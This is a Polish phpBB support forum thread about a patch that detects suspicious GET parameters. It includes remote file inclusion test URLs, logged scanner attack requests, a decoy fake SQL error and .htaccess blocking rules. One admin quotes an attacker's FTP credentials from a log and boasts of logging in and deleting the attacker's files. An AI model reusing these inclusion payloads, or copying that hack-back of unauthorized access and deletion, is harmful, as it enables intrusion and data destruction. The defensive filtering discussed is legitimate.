phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

FAQFAQ - PIERWSZA POMOC!!  regulaminREGULAMIN  SzukajSZUKAJ  UżytkownicyUżytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj  DownloadDownload  katalog Forów DyskusyjnychKatalog Forów   FAQ Video tutoriale

Poprzedni temat «» Następny temat
Przesunięty przez: Woytec
08-01-2014, 20:31
1.12.7 - globalne zabezpieczenie przeciw w?amaniom
Autor Wiadomość
mbru


Posty: 125
Wysłany: 01-02-2010, 19:34   

Do p. Przemo

Sprawdziłem ten link co Pan podał pierw po zalogowaniu na Pańskim Forum

Kod:
/index.php?test=phpbb_root_path=http://test.test/test


I pokazało

Kod:
Hacking attempt


Edytowałem ten plik wg instrukcji i u mnie po dodaniu tego adresu co jest powyżej przychodzi meil z informacją

Kod:
Atak na zmienna: test

Danymi: phpbb_root_path=http://test.test/test

Atak z IP:  HOST:


Czy jest to normalne po wgraniu poprawki bezpieczeństwa.
 
     
Gadatliwa Kasia 

   
Polaczek


Pomógł: 351 razy
Posty: 2297
Wysłany: 01-02-2010, 19:35   

Cytat:
Czy jest to normalne po wgraniu poprawki bezpieczeństwa.


Tak.
Zobacz użyta funkcja mail:

Cytat:
if ( count($HTTP_GET_VARS) )
{
foreach($HTTP_GET_VARS as $key => $val)
{
if ( strlen($val) > 18 && !preg_match('#^[a-z0-9_ /+]*={0,2}$#i', $val) && $key != 'redirect' && $key != 'highlight' )
{
$txt = "Atak na zmienna: ".$key."\n\r";
$txt .= "Danymi: ".$val."\n\r";
$txt .= "Atak z IP: ".$HTTP_SERVER_VARS['REMOTE_ADDR']." HOST: ".gethostbyaddr($HTTP_SERVER_VARS['REMOTE_ADDR'])."\n\r";
$txt .= "Adres referer: ".$HTTP_SERVER_VARS['HTTP_REFERER']."\n\r";

mail($board_config['email_from'], 'Proba ataku na zmienna: '.$key, $txt);

die('Hacking attempt');
}
}
}
_________________
The Cephei Family
stuff 'n' stuff
 
     
mbru


Posty: 125
Wysłany: 01-02-2010, 19:41   

Dziękuję za informacje.
 
     
AlDente

Posty: 4
Wysłany: 02-02-2010, 11:16   

Kolejny błąd pojawia się, gdy sprawdzamy adres IP autora postu, nastęnie zamieniamy na HOST opcją [ IP <-> Host ] a potem znowu na IP.

Kod:
Atak na zmienna: rdns
Danymi: public12345.xdsl.centertel.pl
Adres referer: http://mojastrona.pl/modcp.php?mode=ip&p=253123&t=36123&rdns=79.163.100.200&sid=3c49b8f82873a10d41245632b287d762
 
     
Polaczek


Pomógł: 351 razy
Posty: 2297
Wysłany: 02-02-2010, 11:49   

No właśnie to za duży URL jest. Wcześniej poruszane - http://www.przemo.org/php...p=510658#510658
_________________
The Cephei Family
stuff 'n' stuff
 
     
Przemo



Pomógł: 210 razy
Posty: 3147
Wysłany: 03-02-2010, 21:32   

W standardzie nie bedzie wogole opcji wysylajacej mail :) Ale bedzie napewno gdzies tutaj instrukcja jak ja dodac (wasnie ta jedna linie)

Kurcze ja tutaj dostaje jakies 700 maili w ciagu dnia. Wstawielm tam po wysylce maila sleep(40) zeby zmulic troche im te skanery :D :D No i zrobilem tez ciekawostke zeby skanery myslaly ze znalazly dziure: http://www.przemo.org/php..._asdqwKJHKJHJKH (trzeba czekac) :D :D

Jak ktos bardzo chce to:
Kod:
if ( count($HTTP_GET_VARS) )
{
    foreach($HTTP_GET_VARS as $key => $val)
    {
        if ( strlen($val) > 18 && !preg_match('#^[a-z0-9_ /+]*={0,2}$#i', $val) && $key != 'highlight' && $key != 'redirect' )
        {
            $txt = "Atak na zmienna: ".$key."\n\r";
            $txt .= "Danymi: ".$_SERVER['REQUEST_URI']."\n\r";
            $txt .= "Atak z IP: ".$HTTP_SERVER_VARS['REMOTE_ADDR']." HOST: ".gethostbyaddr($HTTP_SERVER_VARS['REMOTE_ADDR'])."\n\r";
            $txt .= "Adres referer: ".$HTTP_SERVER_VARS['HTTP_REFERER']."\n\r";


            mail($board_config['email_from'], 'Proba ataku na zmienna: '.$key, $txt);



            sleep(40);

            echo '<br />
<b>Notice</b>:  Undefined variable: '.htmlspecialchars($val).' in <b>/home/przemo/public_html/phpBB2/forum/common.php</b> on line <b>320</b><br />

<html>
<body>
phpBB : <b>Critical Error</b>
<br /><br />
Could not query config information<br /><br /><b><u>DEBUG MODE</u></b><br /><br />SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'SELECT *
            FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'\' at line 1<br /><br />SELECT *
            FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'<br /><br />Line : 322<br />File : common.php<span class="gensmall"></span></body>
</html>';

            exit;

        }
    }
}
Tylko zmiencise sobie "przemo" na jakies swoje katalogi czy prefixy
 
     
Przemo



Pomógł: 210 razy
Posty: 3147
Wysłany: 03-02-2010, 21:50   

Nie wiem czy zmylka pojdzie do standardu, to troche "dziwne" i wkurza ewentualnych hakerow, chyba, ze jako opcja ale to troche za duzo konfiguracji :) Napewno takie zabezpieczenie bedzie a czy bedzie zmylka? ... chyba nie.
 
     
AlDente

Posty: 4
Wysłany: 03-02-2010, 22:22   

ja dzisiaj otrzymałem 20 maili pod rząd, z takim komunikatem:

Kod:
Atak na zmienna: t

Danymi: http://217.218.225.2:2082/index.html?

Atak z IP: 79.163.*.* HOST: public399**.xdsl.centertel.pl

Adres referer:


Po wrzuceniu w google adresu 217.218.225.2:2082/index.html?
znalazłem coś takiego:

http://www.smf.pl/forum/index.php?topic=5330.0

dokładnie chodzi o te linijkę
Kod:
http://AdresMojegoForum/index.php?topic=http://217.218.225.2:2082/index.html?


Czy to próba hacku, czy zbieg okoliczności ?

Narzędzie może posłużyć jako wyszukiwarka dziur :)
Dobra robota
 
     
Przemo



Pomógł: 210 razy
Posty: 3147
Wysłany: 03-02-2010, 22:27   

AlDente, to sa skanery szukajace dziur, nie przejmuj sie.


BUHAHA przed chwila dostalem maila:
Kod:
Atak na zmienna: t

Danymi: /phpBB2/forum/viewtopic.php?t=68184///modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D??
:D :D zgadnijcie co zrobilem? :) Mial na tym FTP rozne shelle i inne syfy :)
jeszcze nigdy nie kasowalem katalogu "public_html" :P

Dla osób nie znających tematu wyjasnie, że:
Kod:
ftp://leejinseo:vmfldrmftm@114.108.131.23
To skrócony zapis wejścia na FTP wymagajace autoryzacji, leejinseo to login a vmfldrmftm to haslo
 
     
Polaczek


Pomógł: 351 razy
Posty: 2297
Wysłany: 03-02-2010, 22:56   

Przemo, ktoś chciał się włamać :D hehe dobre
_________________
The Cephei Family
stuff 'n' stuff
 
     
AlDente

Posty: 4
Wysłany: 03-02-2010, 22:58   

Przemo napisał/a:
to sa skanery szukajace dziur, nie przejmuj sie.

ulzylo mi :) Tylko troche dziwi mnie fakt, ze skanowanie zainicjowano z polskiej sieci orange.

Przemo napisał/a:
jeszcze nigdy nie kasowalem katalogu "public_html"

i jakie to uczucie :) ? Wlasciciel pewnie sie ucieszy :lol:
 
     
Przemo



Pomógł: 210 razy
Posty: 3147
Wysłany: 03-02-2010, 23:19   

AlDente napisał/a:
Wlasciciel pewnie sie ucieszy
Wlascicielem jest lama, ktora uzywala skanera :)
 
     
tosiek


Pomógł: 109 razy
Posty: 1418
Wysłany: 06-02-2010, 12:45   

ja od siebie dodam prostszy sposób z htaccess ;)
Kod:
RewriteCond %{QUERY_STRING} https?:// [NC,OR]
RewriteCond %{QUERY_STRING} \.\. [OR]
RewriteCond %{QUERY_STRING} %00$
RewriteRule .* - [F,L]

tylko do tej pory nie wiem jak taki adres przepisać na jakikolwiek skrypt, zawsze wywala error 500, dlatego można utworzyć własna stronę błędu 403 i tam zbanować albo cuś ;)

to jest trochę irytujące te zapytania, dostawałem tak ze 300 info dziennie o bledzie 404 bo mi na wordpressie próbowali zapytaniami z phpbb się włamać :|
_________________
Naprawa krzaczków oraz chińskich literek, przywracanie polskich znaków jak i przenoszenie forów to codzienność... wczorajszość i jutrzejszość.
tosiek - istota śmiertelna, potrafiąca umierać do trzech razy...
 
     
anr

Posty: 40
Wysłany: 06-02-2010, 13:59   

Wpisałem w common.php wedle instrukcji z pierwszego postu.
Sprawdziłem z index.php z linijką test
Kod:
adresforum/index.php?test=phpbb_root_path=http://test.test/test

i wyskoczyło ot co ? :D

Kod:

Forbidden

You don't have permission to access //index.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Power MOD by linuxpl.com Server at fpscs.net Port 80


to normalne ?
nie powinno być
Hacking attempt
 
     
Gadatliwa Kasia 

   
Przemo



Pomógł: 210 razy
Posty: 3147
Wysłany: 07-02-2010, 01:46   

Moze cos zle wpisales bo widze w komunikacie bledu dwa ukosniki: //

Panowie testujcie to dalej czy nie wylapiemy jeszcze jakis miejsc na forum gdzie to sie gryzie. Powiedzcie swoim moderatorom ze jak cos takiego zbacza to niech skopiuja adres URL i dadza Wam znac.
 
     
Wyświetl posty z ostatnich:   
Ten temat jest zablokowany bez możliwości zmiany postów lub pisania odpowiedzi
Nie możesz pisać nowych tematów
Możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Nie możesz ściągać załączników na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!

Powered by phpBB modified by Przemo © 2003 phpBB
Strona wygenerowana w 0,1 sekundy. Zapytań do SQL: 12
Polecane serwisy

Najlepsze oprogramowanie do prowadzenia sklepu internetowegoNajlepszy program do sklepu firmowany przez Przem'a

Sklep z gadżetami

mediaclick.pl

serwis laptopów

phpbb

Polisy Ubezpieczeniowe TU Europa

Design Cart - Tworzenie sklepu internetowego

dnirozwoju.pl

Ranking Hostingów HostingOnline.pl

• Zamów reklamę